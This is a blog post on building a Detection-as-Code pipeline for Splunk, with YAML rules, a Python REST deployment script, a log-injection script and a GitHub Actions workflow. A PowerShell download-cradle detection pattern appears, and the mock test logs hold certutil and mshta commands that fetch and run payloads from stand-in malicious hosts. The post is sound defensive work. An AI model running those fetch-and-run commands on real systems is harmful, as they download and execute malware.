Detection-as-Code: Building Systems, Not Just Rules
Over the past few years, I’ve watched detection engineering evolve from a vaguely defined SOC side hustle into a foundational piece of modern security operations. People love to say “threats are getting more complex” but let’s be real; 95% of what we deal on a day-to-day basis isn’t some ultra-sophisticated nation-state zero-day. It’s misconfigurations, commodity malware, credential stuffing, and IT teams shipping with default passwords. The real challenge isn’t tracking APT29’s next move (especially when your org operates entirely out of Russia anyway), it’s trying to make sense of the overwhelming amount of logs we ingest and figuring out what actually matters, without torching your entire Splunk budget in the process. For anyone who’s new to detection engineering — it is the art and science of turning raw telemetry into actionable security alerts.
Now, I’m not saying threat research doesn’t matter — it absolutely does. But let’s be honest: it’s expensive, time-consuming, and out of reach for most teams. Not every organization can afford a threat research team reverse-engineering malware samples, mapping out custom TTPs, and building detections from scratch. And that’s okay. A mature threat detection program doesn’t need to catch everything; it needs to catch what matters to your environment, consistently. That’s where good detection engineering comes in: writing high-fidelity logic that doesn’t break every time the data shifts or someone renames a field. But to do that properly, you need more than intuition — you need process, structure, and automation.
Instead of writing detections in the SIEM UI and copy-pasting searches like it’s 2014, you treat your rules like real software: version-controlled, peer-reviewed, tested, and deployed through CI/CD. It’s a mindset shift — from reactive firefighting to engineering-driven stability. In this blog, I’ll walk you through how I approached building a DaC strategy using Splunk: from structuring detection rules in YAML, validating SPL like real code, automating deployment with GitHub Actions, and catching issues before they hit production. Whether you’re building detections solo or working in a large team, this is about scaling detection engineering without losing your mind.
This isn’t the way to implement Detection as Code — it’s just a way. DaC is more of a mindset than a strict framework. The goal is to help you think more like an engineer and build a strategy that fits your environment, team size, and tooling.
1. The Real Detection Struggle
The real problem in detection engineering isn’t always the threat itself — it’s everything orbiting around it. We’re drowning in logs we can’t parse, dealing with detections we don’t trust, triaging alerts we can’t explain, and staring at dashboards that cost more than the team’s monthly rent. Meanwhile, security teams are expected to produce meaningful results from this chaos — all while staying within budget and keeping up with the latest TTPs. It’s not just stressful — it’s unsustainable.
At its core, it’s a discipline of precision: filtering the right telemetry, writing logic that survives data drift, and ensuring the detection pipeline doesn’t collapse under its own weight. It’s equal parts systems thinking and security expertise, requiring engineers to balance coverage, clarity, and cost, often under tight timeframes and even tighter ingestion limits.
That’s exactly why I put this blog together — not to make detection engineering sound cooler than it is, but to show how adopting a Detection-as-Code mindset with Splunk helped me bring some sanity to the chaos. By treating detection logic like real code — versioned, reviewed, and tested — I ended up with a pipeline that’s actually reliable, easier to maintain, and scales with the team.
2. Think Like an Engineer
So what exactly is Detection as Code (DaC)? It’s not just putting your SPL in a GitHub repo and calling it DevSecOps. It’s about applying real engineering principles to the detection lifecycle; the same way developers manage software: version control, testing, peer reviews, structured formats, and CI/CD. In traditional SIEM setup, detection rules are often created directly in the Splunk UI – written once, maybe copy-pasted from a Slack message or a blog post, and then left to rot. No context. No tests. No way to track who changed what, when, or why. If something breaks, good luck figuring it out. DaC approach flips that on its head.
Every detection is written as code (usually in YAML or JSON), not in the UI. It lives in Git, just like your Terraform or app configs. You can test detections before they go live, roll them back when needed, and even deploy them automatically using CI/CD pipelines. Most importantly, it forces structure – so your detection engineering isn’t a wild west of inconsistent rule names and forgotten thresholds. DaC also encourages mapping detections to value; you write detections based on what’s needed, not just “what’s available”. Overtime you review unused rules and log dependencies to cut down necessary ingestion hence, making detection coverage data driven and not wishful thinking. Think of it like this: If you wouldn’t deploy a microservice without tests or version control, why would you deploy a detection rule that alerts your SOC at 2AM without the same rigor? Detection as Code is not about adding complexity – it’s about making detection engineering sustainable.
3. Turning Theory into Practiced
At its core, Detection as Code is about separation of logic, structure, and process. Instead of editing rules directly in the Splunk UI, everything lives in a Git repository — version-controlled, peer-reviewed, and backed by automation. I started by organizing everything like a typical software project and each rule is a standalone YAML file. There are even validation scripts to make sure the detections you push, actually fire alerts and when they do, make sure it is either True Positive Malicious or True Positive Benign (A concept from Bradley Kemp). No more playing “Guess That SPL” in the UI.
Each detection includes structured metadata that tells the full story of the rule — not just the search logic:
name: Suspicious PowerShell File Download
cron: "*/50 * * * *"
id: "DET-High-001"
search: index=windows sourcetype IN ("WinEventLogs*", "Microsoft-Windows-PowerShell*") EventCode IN (4688, 4104) AND
((ImageName IN ("pwsh.exe", "powershell.exe", "powershell_ise.exe") AND CommandLine IN ("*Start-BitsTransfer*", "*DownloadFile*", "*Invoke-WebRequest*", "*Invoke-RestMethod*", "*Start-BitsTransfer*", "*iwr *")) OR ScriptBlock IN ("*Start-BitsTransfer*", "*DownloadFile*", "*Invoke-WebRequest*", "*Invoke-RestMethod*", "*Start-BitsTransfer*", "*iwr *")) | stats values(_time) as Timestamp, values(sourcetype) as source, values(EventCode) as Event_Id, values(src_host) as src_host,values(CommandLine) as cmdline, values(scriptBlock) as script, values(ImageName) as proc_name, values(pid) as process_id, values(_raw) as payload
description: Detects suspicious file download attempts via PowerShell.
disabled: false
alert_type: always
earliest_time: -5m
latest_time: now
is_alert: true
alert.severity: 4
alert.track: true
risk_score: 70
references:
- https://detection.fyi/sigmahq/sigma/windows/process_creation/proc_creation_win_powershell_download_cradles/
You can also use JSON format but, YAML just works fine for me as it is easy to read, easy to validate and easy to ingest to my python scrip which handles the detection pipeline. I have kept the same filed names that can directly be ingested to the REST API endpoint else, you can create another layer of abstraction where your script does this for you. You can also introduce tuning fields which you can dynamically process in your python script before pushing it to Splunk.
I created a simple python script utilizing the Splunk’s REST API (documentation here) to manage the pipeline. You can build something like this:
# Config is the loaded from config.json, rule_data is the above formatted rule and headers is basically request headers having authentication token
def create_saved_search_from_yaml(config, rule_data, headers):
url = f"{config['host']}/servicesNS/admin/{config['app']}/saved/searches"
search_query = rule_data["search"]
# Creating JSON body for the request
data = {
"name": rule_data["name"],
"search": search_query,
"cron_schedule": rule_data["cron"],
"description": rule_data.get("description", ""),
"dispatch.earliest_time": rule_data.get("earliest_time", "-35m"),
"dispatch.latest_time": rule_data.get("latest_time", "now"),
"is_scheduled": "1",
"alert_type": rule_data.get("alert_type", "always"),
"alert.track": "1" if rule_data.get("alert.track", True) else "0",
"alert.severity": str(rule_data.get("alert.severity", 3)),
}
for key in rule_data:
if key.startswith("action.") or key.startswith("alert.") or key in ["is_scheduled"]:
data[key] = str(rule_data[key])
# Send the request
response = requests.post(url, headers=headers, data=data, verify=False)
if response.status_code not in [200, 201]:
raise Exception(f"Failed to create saved search:\n{response.text}")
print(f"[+] Alert saved search '{rule_data['name']}' created successfully.")
The config.json file contains basic Splunk configuration:
{
"host": "https://127.0.0.1:8089",
"username": "admin",
"password": "password",
"token": null,
"app": "search"
}
4. Before the Pipeline: Making Sure It Works
Just because a detection rule is written doesn’t mean it works. You need to test the SPL logic before trusting it. There are generally two scenarios when building detection logic:
- You have a dedicated lab or test environment where you simulate attacks (e.g., via Breach and Attack Simulation tools, manual red teaming, or open-source emulation frameworks), and then build detections based on observed telemetry.
- Your organization doesn’t have the luxury of a test lab or tooling budget, so you rely on threat intel reports, public threat research, and security conference talks to create detection coverage.
If you’re in the first camp, great. But make sure to validate your detection logic against the telemetry generated from your simulations before it enters the pipeline. This ensures you’re detecting real behaviors, not writing SPL that looks good but breaks in production. Also, recognize that detection research and detection engineering are different roles — one focuses on understanding threats, the other on building stable, testable detection logic.
If you’re in the second camp, no worries. You can still build strong detections — just translate threat reports and blogs into MITRE ATT&CK TTPs, and then prioritize based on your organization’s risk profile and available telemetry. Here are some ways you can test your detection logic:
- Attack simulation testing (if you have a lab): Run the technique, verify logs, validate detection. You can use the tool of your choice but some cool open source considerations should be Atomic Red teaming and MITRE’s Caldera.
- Mock log-based testing: Use manually crafted or sample events to check detection behavior. Splunk’s attack-data repository is a great starting point to curate your log dataset.
The main goal of Attack simulation / Mock log based testing is to ensure the detection logic detects on the activity it is built for (assuming you have appropriate logging in place). There are ton of resources out there for setting up environment for adversary emulation and/or generating test logs. My favorite walkthrough is from John Hammond for Atomic Red team setup and mock logs, here is a simple python script to inject JSON formatted logs into your Splunk.
import json
import requests
import time
import random
# Configuration
splunk_url = "https://localhost:8088"
splunk_token = "xxxxxxxxx-xxxx-xxxx-xxxxx-xxxxxxxx" # Your HEC token
splunk_index = "testing_index"
sourcetype = "_json"
log_file = "sample_logs.json"
hosts = ["host01", "host02", "endpoint01", "laptop-user", "dc01"]
# Disable SSL warnings
requests.packages.urllib3.disable_warnings()
headers = {
"Authorization": f"Splunk {splunk_token}",
"Content-Type": "application/json"
}
def send_log_to_splunk(event, host):
payload = {
"event": event,
"host": host,
"sourcetype": sourcetype,
"index": splunk_index
}
# print("[DEBUG] Payload:", json.dumps(payload, indent=2))
response = requests.post(
f"{splunk_url}/services/collector",
headers=headers,
data=json.dumps(payload),
verify=False
)
if response.status_code != 200:
print(f"[!] Failed: {response.status_code} - {response.text}")
else:
print(f"[+] Sent: {event.get('Image', '[no Image]')}")
def main():
with open(log_file, "r") as f:
for line in f:
line = line.strip()
if not line:
continue
try:
event = json.loads(line)
host = random.choice(hosts)
send_log_to_splunk(event, host)
time.sleep(0.2)
except Exception as e:
print(f"[!] Error processing log: {e}")
if __name__ == "__main__":
main()
And the sample logs should look something like this (sample_logs.json):
{"EventCode": "1", "Image": "C:\\Windows\\System32\\powershell.exe", "CommandLine": "powershell -enc dGhhbmtzIGZvciBkZWNvZGluZyB0aGlz", "ParentImage": "C:\\Windows\\explorer.exe", "User": "WIN\\User1"}
{"EventCode": "1", "Image": "C:\\Windows\\System32\\certutil.exe", "CommandLine": "certutil.exe -urlcache -split -f http://some-malicious.xyz/dropper.exe", "ParentImage": "C:\\Windows\\System32\\cmd.exe", "User": "WIN\\Admin"}
{"EventCode": "1", "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://malicious.site/malware.hta", "ParentImage": "C:\\Windows\\explorer.exe", "User": "WIN\\User3"}
5. Automation That Saves Your Weekend
So now you’ve got nicely structured YAML rules — great. But if you’re still manually copying and pasting those rules into Splunk, or testing them in prod by watching them blow up the alert queue, you’re missing the whole point of Detection as Code. To actually treat detection engineering like engineering, you need:
- Automated validation (to catch the dumb mistakes),
- Unit and Integration testing (to ensure logic behaves as expected),
- Performance testing, and
- CI/CD pipelines (so the whole team can collaborate without breaking things).
5.1 Designing a Good CI/CD pipeline
CI/CD transforms detection engineering from a reactive, error-prone process into a repeatable, team-friendly workflow. It reduces alert fatigue, avoids costly SPL mistakes in production, and gives you the confidence to iterate quickly — all while keeping auditability and traceability intact. When a new rule is created or modified, a typical pipeline runs through the following stages:
- YAML Validation & Linting — Ensures your detection files follow the expected schema and formatting. This includes checking for required fields, value types and even naming conventions.
- SPL Syntax Validation — Rules are parsed and optionally run in a test Splunk environment or using a lightweight parser to catch syntax errors, missing macros, or broken tokens.
- Alert Volume Simulation — A test search can be run over past X number of days to estimate how noisy the rule is. This helps avoid pushing high-volume detections that overwhelm analysts.
- Cron Simulation / Concurrency Testing — Many detection rules run on schedules and can cause backlogged search queues and to prevent this, it is important that we do not hit the concurrency limits.
- CIM (Field) Validation — You might write SPL that works perfectly in your head — but fails silently in prod because your data source doesn’t include the fields you’re filtering on. You need to validate whether the fields used in the rule logic are being logged and named appropriately.
- Deployment via API — If the rule passes all checks, it’s automatically pushed to Splunk using the REST API or via splunklib library. You can also set it to deploy to staging first, then push to prod after review.
- Notifications — Once deployed, the pipeline can notify your team (Slack, email, etc.), create a changelog, or update your detection dashboard.
You can achieve this using GitHub Actions, GitLab CI, Jenkins or whatever fits your workflow.
5.2 CI/CD with GitHub Actions
Using automated testing is as important as remembering to save your detection before bragging about it on Slack. Here is a sample repository structure that you can use to get started:
detections/
├── endpoint/
│ └── suspicious_ps_encoded.yaml
tests/
├── endpoint/
│ └── suspicious_ps_encoded.test.yaml
ci/
├── validate_schema.py
├── validate_spl.py
├── simulate_cron.py
├── simulate_volume.py
├── validate_fields.py
├── deploy_to_splunk.py
.github/
└── workflows/
└── detection-pipeline.yml
I have a Splunk ES hosted in a VM on my laptop so, I have utilized GitHub’s self-hosted runner for my ease. Here is my workflow file for your reference, you can further add slack webhook action to send a message whenever the workflow fails.
Please note: Only use self-hosted runners with private repositories. This is because forks of your public repository can potentially run dangerous code on your self-hosted runner machine by creating a pull request that executes the code in a workflow.
name: Detection CI/CD Pipeline
on:
push:
branches:
- main
paths:
- 'detections/**'
pull_request:
paths:
- 'detections/**'
jobs:
validate-and-deploy:
runs-on: self-hosted
env:
SPLUNK_HOST: ${{ secrets.SPLUNK_HOST }}
SPLUNK_PORT: 8089
SPLUNK_USERNAME: ${{ secrets.SPLUNK_USERNAME }}
SPLUNK_PASSWORD: ${{ secrets.SPLUNK_PASSWORD }}
steps:
- name: Checkout repository
uses: actions/checkout@v3
- name: Set up Python
uses: actions/setup-python@v4
with:
python-version: '3.11'
- name: Install dependencies
run: pip install -r requirements.txt
- name: Get list of changed detection files
id: changed
run: |
echo "changed_files=$(git diff --name-only origin/main -- 'detections/**/*.yaml' | tr '\n' ' ')" >> $GITHUB_OUTPUT
- name: Print changed files
run: echo "Changed files: ${{ steps.changed.outputs.changed_files }}"
- name: Validate detection schema
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/validate_schema.py "$file"
done
- name: Validate SPL syntax
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/validate_spl.py "$file"
done
- name: Simulate cron and validate time windows
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/simulate_cron.py "$file"
done
- name: Simulate alert volume
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/simulate_volume.py "$file"
done
- name: Validate required fields in test data
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/validate_fields.py "$file"
done
- name: Push rules to Splunk
if: steps.changed.outputs.changed_files != ''
run: |
for file in ${{ steps.changed.outputs.changed_files }}; do
python ci/deploy_to_splunk.py "$file"
done
Most of these testing can be done via interacting with the following endpoints. Of course, for almost all of these requests you would need Splunk’s authorization token to be present in the headers.
// Get authorization token using creds
POST /services/auth/login
// Fetch all the saved rules for admin user
GET /servicesNS/admin/search/saved/searches?output_mode=json&count=0
// Fetch hard concurrency limits set in limits.conf
GET /servicesNS/nobody/search/configs/conf-limits/search?output_mode=json
// For lightweight SPL syntax checking
POST /services/search/parser
// Actually runs the query for a small timeframe
POST /services/search/jobs/export
With good CI/CD, you stop firefighting and start engineering. Rules become assets — not liabilities. Testing isn’t an afterthought. It’s part of the workflow. And your detection team becomes faster, calmer, and a whole lot more confident.
6. Take What Works, Leave What Doesn’t (Seriously)
The strategy and tooling outlined in this blog are not meant to be the pages of Bible. Every organization has its own context — different log sources, risk appetite, team capacity, and infrastructure limitations. What worked in my case may not translate directly to yours, and that’s perfectly fine. Detection as Code isn’t a rigid framework — it’s a mindset shift. It’s about applying proven software engineering practices to detection logic so that it becomes easier to manage, scale, and improve over time. If you’re here looking for a one-size-fits-all solution, this blog won’t give you that.
Looking ahead, there’s a lot more that can be built on top of this foundation. For instance, integrating threat intelligence feeds to dynamically tune detection logic, or linking detection pipelines with enrichment tools to auto-tag alerts before they hit the SOC queue. Feedback loops from incident response teams can inform detection tuning, while historical alert data can help build regression tests to prevent old issues from resurfacing. The possibilities are vast — and the more mature your environment becomes, the more automation, tuning, and sophistication you can introduce into the pipeline.
Ultimately, the goal isn’t just to “do Detection-as-Code” because it’s trendy. It’s to build a system where detection engineering becomes reliable, auditable, and fast. A place where rules don’t live in a spreadsheet or someone’s memory, but in a well-structured repo. This blog is a snapshot of that journey, not the final destination. Take what fits, adapt what doesn’t, and don’t be afraid to throw the whole thing out and rebuild it in a way that works best for your team. If it helps reduce alert fatigue, improve detection coverage, or simply keeps the Splunk bill in check — that’s a win.
“Because at the end of the day, reliable detection isn’t about writing perfect SPL — it’s about building a system where imperfect detections can still improve.”